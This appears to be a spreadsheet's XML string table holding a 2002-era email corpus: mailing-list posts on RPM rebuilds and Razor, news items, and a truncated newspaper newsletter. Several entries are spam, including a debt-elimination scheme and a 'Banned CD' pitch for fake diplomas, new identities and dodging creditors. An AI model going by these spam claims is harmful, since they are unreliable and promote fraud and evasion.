  <si>
    <t xml:space="preserve">Once upon a time, Hesty wrote :
 &gt; &gt; Where you can see :
 &gt; &gt; Available rpmbuild rebuild options :
 &gt; &gt; --with : alsa
 &gt; &gt; --without : aalib lirc libdv arts
 &gt; 
 &gt; Does this mean when rebuilding the package, I'll
 &gt; simply
 &gt; type: 
 &gt; &gt; rpmbuild --rebuild &lt;package&gt;.src.rpm --with alsa ?
 Yes it does. And if you're missing the dependencies needed for the selected
 options, you'll even be informed! (for ALSA, you'll need alsa-lib-devel for
 example)
 &gt; &gt; I'd like to aks this on the rpm-zzzlist : Would a new
 &gt; &gt; dependency of 250k, the
 &gt; &gt; alsa-lib package, for many packages (mplayer, ogle,
 &gt; &gt; xine) be a problem for
 &gt; &gt; the freshrpms.net packages users? As I really feel
 &gt; &gt; like blending ALSA in
 &gt; &gt; now, especially since I've just spent some time
 &gt; &gt; recompiling alsa-kernel
 &gt; &gt; package for all the Psyche kernels!!!
 &gt; &gt; 
 &gt; 
 &gt; I'll have no problem at all with this and you get my
 &gt; vote on this one. 
 &gt; 
 &gt; One problem with alsa-kernel that I've experienced:
 &gt; everytime RH issues a new kernel update, I have to
 &gt; rebuild my alsa-kernel to match the new kernel.
 Yup... unfortunately the alsa-kernel needs to be rebuilt for each kernel,
 and there's no way of avoiding it.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</si>
  <si>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[zzzzteana] Cambodian Buddhaas unearthed
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/world/asia-pacific/2220132.stm
 Tuesday, 27 August, 2002, 21:35 GMT 22:35 UK
 Cambodia temple ruins yield treasure
 Workers clearing dense jungle near the ruins of an ancient pagoda in
 northern Cambodia have unearthed 31 Buddha statues - 27 of them solid gold.
 The statues - which are 10 centimetres (4 inches) tall - are in good
 condition and believed to be hundreds of years old.
 They were found on Saturday as workers were rebuilding the Po Pich temple
 about 100 km (65miles) north of the capital, Phnom Penh.
 The pagoda, in the Batay district of Kampong Thom province, was torn down
 during the reign of the Khmer Rouge in the 1970s and the area became
 overgrown.
 Community care
 Deputy police chief of Kampong Thom province, Hang Sithim, said the statues
 - three of which were silver and one bronze - were buried in about one metre
 (3.4ft) of earth and each weigh around 500 grams (1lb).
 ''I think that these Buddha statues had been buried hundreds of years ago,
 when the last temple was fully operating," Mr Hang Sithim said.
 Provincial authorities initially planned to take the statues to a nearby
 town for safekeeping, but opted to allow the Buddhist community at the
 temple to take care of them.
 ''We believe they are safe there,'' said Som Somphat, deputy governor of
 Kampong Thom province.
 ''The people of Po Pich pledged to treat them with respect and honour.''
 Reign of terror
 A police guard has been placed around the site to protect it from looters.
 The Khmer Rouge waged civil war in Cambodia between 1970 and 1998 and
 controlled the country between 1975 and 1979.
 The regime outlawed religion and destroyed many objects regarded as decadent
 or culturally impure.
 About two million people died in the Khmer Rouge's drive to turn Cambodia
 into a farmers' utopia.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Eliminate Debt~No Bankrputcy!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT size=3D2&gt;&lt;B&gt; Eliminate your credit card debt without filing bankrupt=
 cy!&lt;BR&gt;
   &lt;BR&gt;
 &lt;/B&gt;
 &lt;FONT color=3D"#0000FF"&gt;&lt;B&gt; Are you tired of making minimum payments and b=
 arely getting by?&lt;BR&gt;
 Are you drowning in debt? &lt;BR&gt;
 Are you ready for a change and some freedom?&lt;BR&gt;
 &lt;BR&gt;
 What will buying this package do for me?&lt;BR&gt;
 &lt;BR&gt;
 *It will terminate your credit card debt! &lt;BR&gt;
 (Major credit cards only - Not department store cards or gas cards)&lt;BR&gt;
 *This covers cash advances!&lt;BR&gt;
 *This covers unsecured loans as well!&lt;BR&gt;
 *It will allow you to stop making monthly payments immediately! &lt;BR&gt;
 *It will empower you to take back the control of your life! &lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt; &lt;BR&gt;
 &lt;BR&gt;
 *Unlike bankruptcy this keeps your affairs completely private!&lt;BR&gt;
 Only you, the creditors, and the credit bureau will know.&lt;BR&gt;
 &lt;BR&gt;
 However, you will not lose your home, or any other assets!&lt;BR&gt;
 &lt;BR&gt;
 *You will no longer be able to use those credit cards.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;
 &lt;FONT color=3D"#0000FF"&gt;&lt;B&gt; The price of this package runs between $1750-$=
 2450.&lt;BR&gt;
 We accept all forms of payment and offer a guarantee too.&lt;/B&gt;&lt;/FONT&gt;&lt;B&gt; &lt;B=
 R&gt;
 &lt;BR&gt;
 This program has been used successfully for 7 years!&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;
 &lt;FONT color=3D"#FF0000"&gt;&lt;B&gt; For more information please call: 1-800-694-51=
 44&lt;BR&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt;       &lt;BR&gt;
 &lt;BR&gt;
 This works in the US ONLY!&lt;BR&gt;
 &lt;/B&gt; &lt;BR&gt;
 To opt out of our mailing list simply reply to this email.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;p&gt;&lt;FONT face=3D"MS Sans Serif"&gt;&lt;p&gt;&lt;FONT size=3D2&gt;&lt;B&gt; Eliminate your credi=
 t card debt without filing bankruptcy!&lt;BR&gt;&lt;p&gt;  &lt;BR&gt;&lt;p&gt;&lt;/B&gt;&lt;p&gt;&lt;FONT color=3D=
 "#0000FF"&gt;&lt;B&gt; Are you tired of making minimum payments and barely getting =
 by?&lt;BR&gt;&lt;p&gt;Are you drowning in debt? &lt;BR&gt;&lt;p&gt;Are you ready for a change and =
 some freedom?&lt;BR&gt;&lt;p&gt;&lt;BR&gt;&lt;p&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Australia declares world's largest marine reserve
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8704787,1440/
 Date: Not supplied
 The reserve will protect the pristine habitats of a group of sub-Antarctic 
 islands described as the "wildest place on Earth"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lease Deal
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html xmlns:v="urn:schemas-microsoft-com:vml"
 xmlns:o="urn:schemas-microsoft-com:office:office"
 xmlns="http://www.w3.org/TR/REC-html40"&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-gb"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;link rel="File-List" href="Mercedesoffer_files/filelist.xml"&gt;
 &lt;title&gt;Latest news and information&lt;/title&gt;
 &lt;!--[if !mso]&gt;
 &lt;style&gt;
 v\:*         { behavior: url(#default#VML) }
 o\:*         { behavior: url(#default#VML) }
 .shape       { behavior: url(#default#VML) }
  table.MsoNormalTable
 	{mso-style-parent:"";
 	font-size:10.0pt;
 	font-family:"Times New Roman"}
 &lt;/style&gt;
 &lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;
 &lt;xml&gt;&lt;o:shapedefaults v:ext="edit" spidmax="1027"/&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;
 &lt;/head&gt;
 &lt;body&gt;
   &lt;table border="1" cellpadding="0" cellspacing="0"
 style="border-collapse: collapse" bordercolor="#111111" width="259"
 height="388" id="AutoNumber1"&gt;
     &lt;tr&gt;
       &lt;td width="259" height="388" valign="top"&gt;
       &lt;table height="842" cellSpacing="0" cellPadding="0" width="100%"
 border="0"&gt;
         &lt;tr&gt;
           &lt;td vAlign="centre" align="middle" bgColor="#ffffff" height="842"&gt;
           &lt;table height="895" cellSpacing="0" cellPadding="0" width="767"
 border="0" style="border-left-width: 0; border-right-width: 0"&gt;
             &lt;tr&gt;
               &lt;td width="780" bgColor="#C0C0C0" colSpan="2" height="112"
 style="border-style: solid; border-width: 1"&gt;
               &lt;p align="center"&gt;
               &lt;span style="font-size: 26pt; font-family: Times New Roman"&gt;
               Leasing Deal of the Year&lt;br&gt;
               &lt;/span&gt;&lt;font size="6"&gt;&lt;span style="font-family: Times New
 Roman"&gt;
               Mercedes-Benz&lt;/span&gt;&lt;/font&gt;&lt;span style="font-family: Times
 New Roman"&gt;&lt;font size="6"&gt; 
               E240 (2.6) Elegance Auto&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td align="left" width="633" bgColor="#ffffff"
 height="352"&gt;&lt;p&gt;
               &lt;span style="font-size: 11.0pt; font-family: Dax"&gt;&lt;!--[if
 gte vml 1]&gt;&lt;v:shapetype id="_x0000_t75"
  coordsize="21600,21600" o:spt="75" o:preferrelative="t"
 path="m@4@5l@4@11@9@11@9@5xe"
  filled="f" stroked="f"&gt;
  &lt;v:stroke joinstyle="miter"/&gt;
  &lt;v:formulas&gt;
   &lt;v:f eqn="if lineDrawn pixelLineWidth 0"/&gt;
   &lt;v:f eqn="sum @0 1 0"/&gt;
   &lt;v:f eqn="sum 0 0 @1"/&gt;
   &lt;v:f eqn="prod @2 1 2"/&gt;
   &lt;v:f eqn="prod @3 21600 pixelWidth"/&gt;
   &lt;v:f eqn="prod @3 21600 pixelHeight"/&gt;
   &lt;v:f eqn="sum @0 0 1"/&gt;
   &lt;v:f eqn="prod @6 1 2"/&gt;
   &lt;v:f eqn="prod @7 21600 pixelWidth"/&gt;
   &lt;v:f eqn="sum @8 21600 0"/&gt;
   &lt;v:f eqn="prod @7 21600 pixelHeight"/&gt;
   &lt;v:f eqn="sum @10 21600 0"/&gt;
  &lt;/v:formulas&gt;
  &lt;v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/&gt;
  &lt;o:lock v:ext="edit" aspectratio="t"/&gt;
 &lt;/v:shapetype&gt;&lt;v:shape id="_x0000_s1027" type="#_x0000_t75"
 style='width:463.5pt;
  height:246.75pt'&gt;
  &lt;v:imagedata src="Mercedesoffer_files/image001.jpg" o:title="E240Merc"/&gt;
 &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;![if !vml]&gt;&lt;img border=0 width=618 height=329
 src="http://www.mercedes.co.uk/usedcars/Search/MTCarImages/P312GDW.jpg"
 v:shapes="_x0000_s1027"&gt;&lt;![endif]&gt;&lt;br&gt;
 &amp;nbsp;&lt;/span&gt;&lt;/p&gt;
               &lt;div style="mso-shading: windowtext; mso-pattern: gray-10
 auto; width: 621; height: 232; border: 1.5pt double windowtext;
 padding-left: 4.0pt; padding-right: 4.0pt; padding-top: 5.0pt;
 padding-bottom: 7.0pt; background: #E5E5E5"&gt;
                 &lt;p class="MsoNormal" align="center" style="text-align:
 center; border: medium none; padding: 0in; background: #E5E5E5"&gt;
                 &lt;span style="font-family: Times New Roman"&gt;&lt;font size="4"&gt;
                 Specification includes: Automatic, Metallic Paint, Alloy
 Wheels, 
                 Electric Windows, Remote Central Locking, Electric Folding 
                 Mirrors, Trip computer, Air Conditioning, Headlamp Wash,
 Rear 
                 Head Restraints, Tinted Windows and Wood
 Trim&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
                 &lt;p class="MsoNormal" align="center" style="text-align:
 center; border: medium none; padding: 0in; background: #E5E5E5"&gt;
                 &lt;span style="font-size: 8.0pt; font-family: Times New
 Roman"&gt;&amp;nbsp;&lt;/span&gt;&lt;font size="6"&gt;&lt;span style="font-family: Times New
 Roman"&gt;299.00 
                 per month 2 years (3+23)&lt;br&gt;
                 276.70&lt;/span&gt;&lt;span style="FONT-FAMILY: Times New Roman"&gt;
 per 
                 month&lt;/span&gt;&lt;span style="font-family: Times New Roman"&gt;&lt;b&gt;
 &lt;/b&gt;3 
                 years (3+35)&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;p class="MsoNormal" align="center" style="text-align:
 center; border: medium none; padding: 0in; background: #E5E5E5"&gt;
                 &lt;b&gt;&lt;span style="font-family: Times New Roman"&gt;Used 2001 
                 Registered&lt;/span&gt;&lt;font face="Times New Roman"&gt; 01 Y
 &amp;amp;&amp;nbsp; 01 51 
                 plates (sub12,000miles)&lt;br&gt;
                 &lt;/font&gt;&lt;/b&gt;&lt;span style="font-size: 10.0pt; font-weight:
 700"&gt;
                 10,000 miles per year, PCP, PCH, Contract Purchase and
 Finance 
                 Lease are also available on request&lt;/span&gt;&lt;/div&gt;
               &lt;/td&gt;
               &lt;td align="right" width="147" bgColor="#ffffff" height="352"&gt;
               &lt;p align="center"&gt;
               &amp;nbsp;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td align="left" width="633" bgColor="#ffffff" height="71"&gt;
               &lt;p align="center"&gt;
               &lt;font face="Arial, Helvetica, sans-serif" color="#010098"
 size="5"&gt;
               &lt;b&gt;Telephone: 01702 530174&lt;/b&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;Fax:
 01702 530200&lt;/b&gt;&lt;/font&gt;&lt;font size="5"&gt;
               &lt;/font&gt;&lt;/td&gt;
               &lt;td align="right" width="147" bgColor="#ffffff" height="71"&gt;
               &lt;a href="mailto:sales@sesystems.co.uk"&gt;
               &lt;img border="0"
 src="http://www.sesystems.co.uk/images/thumb/email4.gif" width="45"
 height="52"&gt;&lt;/a&gt;&lt;font color="#010098" face="Arial, Helvetica, sans-serif"
 size="2"&gt;&lt;a href="mailto:sales@sesystems.co.uk"&gt;Email:
 sales@sesystems.co.uk&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] razor plugins for mozilla?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
 did any of you hear about a a razor plugin for mozilla?
 a plugin that would add a "report as spam" button somewhere for the user 
 to report a mail as spam on a server?
 Arnaud
 -- 
 Arnaud Ablard
 Administrateur rseaux et systmes
 Irin / Facult de Sciences
 Universit de Nantes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</si>
  <si>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Ah ... so they ARE coming for your porn next ...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://www.cnn.com/2002/US/07/23/binladen.internet/index.html
     ... CNN reported earlier this year that al Qaeda has used at least one
     Web site to post information and keeps changing the site's address to
     stay ahead of investigators.
     Authorities also are investigating information from detainees that
     suggests al Qaeda members -- and possibly even bin Laden -- are hiding
     messages inside photographic files on pornographic Web sites.
 Any wagers that this heralds the appearance of a bill to ban and/or
 harrass any sites which may be host to suspected-AlQaeda messages?
 And what about Emenem records played backwards?
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 how's about the String Joke?
 A piece of string and his friend walks into a bar.  The barman says
 "sorry, we don't serve string here".  String &amp; friend walk out
 (grumbling).  String asks friend "listen, could you tatter my ends and
 tie me up?"  Friend obliges, and they return; barman says "aren't you
 that piece of string I threw out?"  "No, I'm a frayed knot."
 --j.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">**********************************banned cd***********************************************
 *******************************June 5 2002************************************************
 I have been receiving emails saying that I'm contributing to the "moral decay of society" by selling the Banned CD.  That may be, but I feel strongly that you have a right to benefit from 
 this hard-to-find information. 
 So I am giving you ONE LAST CHANCE to order the Banned CD! 
 With this powerful CD, you will be able to investigate your friends, enemies and lovers in just minutes using the Internet.  You can track down old flames from college, or you can dig up some dirt on your boss to make sure you get that next promotion! 
 Or maybe you want a fake diploma to hang on your bedroom wall.  You'll find addresses for companies that make these diplomas on the Banned CD. 
 Need to disappear fast and never look back?  No problem! 
 Using the Banned CD, you will learn how to build a completely 
 new identity. 
 Obviously, the Powers That Be don't want you to have the Banned CD.  They have threatened me with lawsuits, fines, and even imprisonment unless I stop selling it immediately. But I feel that YOU have a Constitutional right to access this type of information, and I can't be intimidated. 
  Uncle Sam and your creditors are horrified that I am still selling this99exit
 And you can't buy freedom at your local Walmart.  You will dg43000sdasdfasdffgdfhyutdfsgttttrsdg
 have the freedom to avoid creditors, judgments, lawsuits, IRS 
 tax collectors, criminal indictments, your greedy ex-wife or 
 ex-husband, and MUCH more!
 Please Click the URL for the Detail! 
 http://%62%61nn%65%64%63d.net
 You are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from Travel Easy. To Be Removed From Our List, 
 http://%62%61nn%65%64%63d.net/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Eagle: Lieutenant governor's race competitive, unique
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- to unsubscribe or change email format click on the below link --&gt;&lt;!-- http://www.berkshireeagle.com/newsletter --&gt;&lt;!-- Vignette V6 Mon Sep 02 07:23:30 2002 --&gt;
 &lt;!-- Vignette V6 Mon Sep 02 07:23:31 2002 --&gt;
 &lt;!-- libOpenCDA reports: OID = 101~6279~ --&gt;
 &lt;!-- NMOTemplateInclude: strPseudoRelPath = /entry --&gt;
 &lt;html&gt;
 &lt;head&gt;	
 &lt;title&gt;Berkshire Eagle&lt;/title&gt;
 &lt;!-- CssBuilder Version: 1.0 --&gt;
 &lt;!-- intCssSectionID = 6279 --&gt;
 &lt;!-- CSS Builder: All parents of section found... ---&gt;
 &lt;!-- Executing: CssStyles_GetAllStylesByPaperID 101 --&gt;
 &lt;style type="text/css"&gt;
     .articleBody  {
       font-family:verdana, arial, helvetica;
       font-size:13px;
     }
     .articleByline  {
       font-family:verdana, arial, helvetica;
       font-weight:normal;
       font-style:italic;
       font-size:13px;
       height:30px;
     }
     .articleDate  {
       font-family:verdana, arial, helvetica;
       font-size:11px;
     }
     .articleHeadline  {
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-size:18px;
       height:36px;
       text-align:left;
     }
     .articleImageCaption  {
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-size:9px;
     }
     .articleOptions  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:8px;
       text-decoration:none;
       vertical-align:middle;
     }
     .articleOptionsHead  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:normal;
       font-size:8px;
     }
     .articleOptionsTop  {
       color:#999999;
       font-family:verdana, arial, helvetica, sans-serif;
       font-weight:bold;
       font-size:8px;
       text-decoration:none;
       vertical-align:middle;
     }
     .articleOverline  {
       font-family:sans-serif, arial, helvetica;
       font-weight:normal;
       font-size:12px;
       height:24px;
       text-align:left;
     }
     .articlesFrom  {
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:14px;
     }
     .articleSubHeadline  {
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:14px;
       height:30px;
     }
     .breakNewsBox  {
       color:#000000;
       background-color:#FFFFFF;
       width:200px;
       text-align:left;
       border-width:1px;
       border-color:#666666;
       border-style:solid;
     }
     .breakNewsHead  {
       color:#FFFFFF;
       background-color:#00008B;
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-style:normal;
       font-size:14px;
       text-decoration:none;
       border-style:ridge;
     }
     .breakNewsLink  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:verdana, arial, helvetica;
       font-size:11px;
     }
     .breakNewsSection  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-size:11px;
       text-decoration:none;
     }
     .content  {
       color:#000000;
       background-color:#ffffff;
       font-family:ans-serif, arial, helvetica;
       font-size:10px;
     }
     .date  {
       color:#000000;
       font-family:arial, sans-serif, helvetica;
       font-weight:bold;
       font-size:9px;
     }
     .homeArticleBlurb  {
       font-family:verdana, arial, helvetica;
       font-size:12px;
     }
     .homeArticleLinkText  {
       color:#000000;
       font-family:verdana, arial, helvetica;
       font-size:12px;
     }
     .homeArticleTitle  {
       color:#000000;
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-size:14px;
     }
     .homeSectionTitle  {
       color:#FFFFFF;
       background-color:#00008B;
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-style:normal;
       font-size:14;
       width:55%;
       text-decoration:none;
       border-style:inset;
     }
     .nav  {
       background-color:#FFFFFF;
     }
     .navaa  {
       color:#000099;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:13px;
       text-decoration:none;
       text-indent:2px;
     }
     .navab  {
       color:#CC3333;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:13px;
       text-decoration:underline;
       text-indent:2px;
     }
     .navba  {
       color:#000099;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
       height:15px;
       text-decoration:underline;
       text-indent:7px;
     }
     .navbb  {
       color:#CC0000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:normal;
       font-size:10px;
       height:15px;
       text-decoration:underline;
       text-indent:7px;
     }
     .navca  {
       color:#999999;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
       height:15px;
       text-decoration:underline;
       text-indent:12px;
     }
     .navcb  {
       color:#CC0000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:normal;
       font-size:10px;
       height:15px;
       text-decoration:underline;
       text-indent:12px;
     }
     .nmoMastHead  {
       background-color:#FFFFFF;
       text-align:center;
     }
     .otherArticlesBox  {
       background-color:#FFFFFF;
     }
     .otherArticlesDate  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
       text-align:center;
     }
     .otherArticlesHead  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:normal;
       font-size:10px;
     }
     .otherArticlesLink  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
     }
     .otherArticlesTitle  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:normal;
       font-size:10px;
     }
     .packageHead  {
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:14px;
     }
     .packageLink  {
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
     }
     .pageBottomLinks  {
       color:#000099;
       font-family:arial, verdana, sans-serif;
       font-size:12px;
       text-decoration:underline;
     }
     .pageBottomTitle  {
       color:#FFFFFF;
       background-color:#000066;
       font-family:arial, verdana, sans-serif;
       font-weight:bold;
       font-size:16px;
     }
     .pageLeftLinks  {
       color:#000066;
       font-family:arial, sans-serif, verdana;
       font-size:11px;
       text-decoration:none;
     }
     .pollsAnswer  {
       color:#000000;
       font-family:sans-serif, arial, helvetica;
       font-size:11px;
       vertical-align:top;
     }
     .pollsBox  {
       background-color:#FFFFFF;
       width:120px;
       border-width:2px;
       border-color:#EEEEEE;
       border-style:outset;
     }
     .pollsHead  {
       color:#000000;
       background-color:#9999FF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
       text-align:center;
       border-width:2px;
       border-color:#EEEEEE;
       border-style:outset;
     }
     .pollsQuestion  {
       color:#000000;
       font-family:sans-serif, arial, helvetica;
       font-size:11px;
       text-align:center;
     }
     .pollsViewResults  {
       color:#000066;
       font-family:sans-serif, arial, helvetica;
       font-style:italic;
       font-size:14px;
       text-align:center;
     }
     .redbody  {
       color:#FF0000;
       font-family:arial, verdana, helvetica;
       font-weight:bold;
       font-size:13px;
     }
     .searchBody  {
       color:#000000;
       background-color:#CCCCCC;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:12px;
     }
     .searchBox  {
       background-color:#CCCCCC;
       border-width:2px;
       border-color:#000000;
       border-style:groove;
     }
     .searchHead  {
       color:#FFFFFF;
       background-color:#000000;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:14px;
     }
     .searchNew  {
       color:#0033FF;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:10px;
       text-decoration:none;
     }
     .searchPages  {
       color:#660099;
       font-family:sans-serif, arial, helvetica;
       font-size:12px;
     }
     .searchQuery  {
       color:#000000;
       font-family:sans-serif, arial, helvetica;
       font-size:12px;
     }
     .searchResultAuthor  {
       color:#000000;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:10px;
     }
     .searchResultBody  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:12px;
     }
     .searchResultDate  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:12px;
     }
     .searchResultLinkTitle  {
       color:#0033FF;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:14px;
     }
     .searchResultSection  {
       color:#000000;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:14px;
     }
     .sectionArticleBlurb  {
       font-family:verdana, arial, helvetica;
       font-size:12px;
       text-align:justify;
     }
     .sectionArticleTitle  {
       color:#000066;
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-size:14px;
     }
     .sectionImageCaption  {
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-size:10px;
     }
     .sectionLinkText  {
       color:#000066;
       font-family:verdana, arial, helvetica;
       font-size:11px;
     }
     .sectionSectionTitle  {
       color:#000000;
       font-family:verdana, arial, helvetica;
       font-weight:bold;
       font-size:25px;
     }
     .simpleSearchHead  {
       color:#999999;
       background-color:#FFFFFF;
       font-family:verdana, arial, helvetica;
       font-size:9px;
     }
     .simpleSearchLink  {
       color:#999999;
       background-color:#FFFFFF;
       font-family:verdana, arial, helvetica;
       font-size:9px;
       text-decoration:none;
     }
     .simpleSearchText  {
       color:#000000;
       background-color:#FFFFFF;
       font-family:verdana, arial, helvetica;
       font-size:9px;
     }
     .time  {
       color:#000000;
       font-family:arial, sans-serif, helvetica;
       font-size:9px;
     }
     .topNavBar  {
       background-color:#003463;
     }
     .weatherBox  {
       background-color:#FFFFFF;
       width:120px;
       border-width:1px;
       border-color:#00659C;
       border-style:solid;
     }
     .weatherContent  {
       border-width:3px;
       border-color:#FFFFFF;
       border-style:solid;
     }
     .weatherHead  {
       color:#FFFFFF;
       background-color:#00659C;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:10px;
       text-align:center;
     }
     .weatherHigh  {
       color:#FF0000;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
     }
     .weatherLow  {
       color:#3399FF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
     }
     .WthrDay  {
       font-family:Arial, Helvetica, sans-serif;
       font-weight:bold;
       font-size:12px;
       text-align:center;
     }
     .WthrDayInfo  {
       font-family:Arial, Helvetica, sans-serif;
       font-size:11px;
       text-align:center;
     }
     .WthrDetailed  {
       font-family:Arial, Helvetica, sans-serif;
       font-weight:normal;
       font-size:12px;
       text-align:left;
     }
     .WthrEven  {
       background-color:#FFFFFF;
       font-family:verdana;
       font-size:11px;
     }
     .WthrHi  {
       color:#CC0033;
       font-family:arial;
       font-weight:bold;
       font-size:12px;
     }
     .WthrIcon  {
       text-align:center;
     }
     .WthrLink  {
       color:#003399;
       font-family:arial;
       font-size:12px;
       text-align:center;
     }
     .WthrLow  {
       color:#3366CC;
       font-family:arial;
       font-weight:bold;
       font-size:12px;
     }
     .WthrOdd  {
       background-color:#CCCCCC;
       font-family:verdana;
       font-size:11px;
     }
     .WthrRule  {
       color:000099;
       background-color:000099;
       height:1px;
     }
     .WthrSubTitle  {
       font-family:Arial, Helvetica, sans-serif;
       font-weight:bold;
       font-size:13px;
     }
     .WthrText  {
       color:#666666;
       font-family:Arial, Helvetica, sans-serif;
       font-style:italic;
       font-size:12px;
     }
     .WthrTitle  {
       color:000099;
       font-family:Arial, Helvetica, sans-serif;
       font-weight:bold;
       font-size:14px;
     }
     a:hover.navaa  {
       color:#0000FF;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-weight:bold;
       font-size:13px;
       text-decoration:underline;
       text-indent:2px;
     }
     a:hover.navba  {
       color:#0000FF;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
       text-decoration:underline;
       text-indent:7px;
     }
     a:hover.navca  {
       color:#0000FF;
       background-color:#FFFFFF;
       font-family:sans-serif, arial, helvetica;
       font-size:10px;
       height:15px;
       text-decoration:underline;
       text-indent:12px;
     }
     a:hover.pageLeftLinks  {
       color:#000066;
       font-family:arial, sans-serif, verdana;
       font-size:11px;
